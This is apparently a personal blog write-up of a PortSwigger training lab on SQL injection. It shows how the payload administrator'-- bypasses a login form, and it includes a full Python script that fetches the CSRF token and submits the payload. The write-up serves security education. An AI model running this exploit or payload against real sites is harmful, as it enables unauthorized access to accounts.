Shubham Ranpise

Back

SQLi Lab 2

Bypassing authentication through classic SQL injection on a vulnerable login form.

portswigger-labs content

SQL injection vulnerability allowing login bypass#

In this lab, I exploited a classic SQL injection vulnerability in a login form to bypass authentication. By injecting malicious input directly into the username field, I was able to manipulate the backend SQL query and log in as the administrator—without needing the actual password. This vulnerability highlights the critical importance of sanitizing user input and using parameterized queries to prevent injection attacks.

The bypass was achieved using a simple payload that comments out the password check portion of the SQL query. It was also essential to dynamically extract the CSRF token from the login page, as the application enforced token-based protection for form submissions.

How Exploit Works#

  • The login form input is vulnerable to SQL injection.
  • Use a crafted username: administrator'-- to bypass password validation.
  • The server executes a manipulated SQL query and logs you in as the administrator.
  • CSRF token is fetched dynamically to make a valid login attempt.
  • A successful login is confirmed when the usual “Invalid username or password” error does not appear.

Usage#

python3 exploit.py https://<your-lab-id>.web-security-academy.net
cmd

Exploit#

exploit.py
import requests
import sys
import urllib3
from bs4 import BeautifulSoup

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}

def get_csrf_token(s, url):
    uri = "/login"
    r = s.get(url + uri , verify=False, proxies=proxies)
    soup = BeautifulSoup(r.text, 'html.parser')
    csrf = soup.find("input") ['value']
    return csrf

def exploit_sqli(s, url, payload):
    csrf = get_csrf_token(s, url)
    data = {"csrf": csrf,
            "username": payload,
            "password": payload}
    uri = "/login"
    r = s.post(url + uri, data=data, verify=False, proxies=proxies)
    res = r.text
    
    if "Invalid username or password." in res:
        return False
    else:
        return True
    
if __name__ == "__main__":
    try:
        url = sys.argv[1].strip()
        sqli_payload = "administrator'--"
    except IndexError:
        print("[-] Usage: %s <url>" %sys.argv[0])
        print('[-] Example: %s www.example.com' %sys.argv[0])
        
    s = requests.Session()
    
    if exploit_sqli(s, url, sqli_payload):
        print("[+] SQL injection successful! We have logged in as the administrator user.")
    else:
        print("[-] SQL injection unsuccessful.")
python

See more portswigger-labs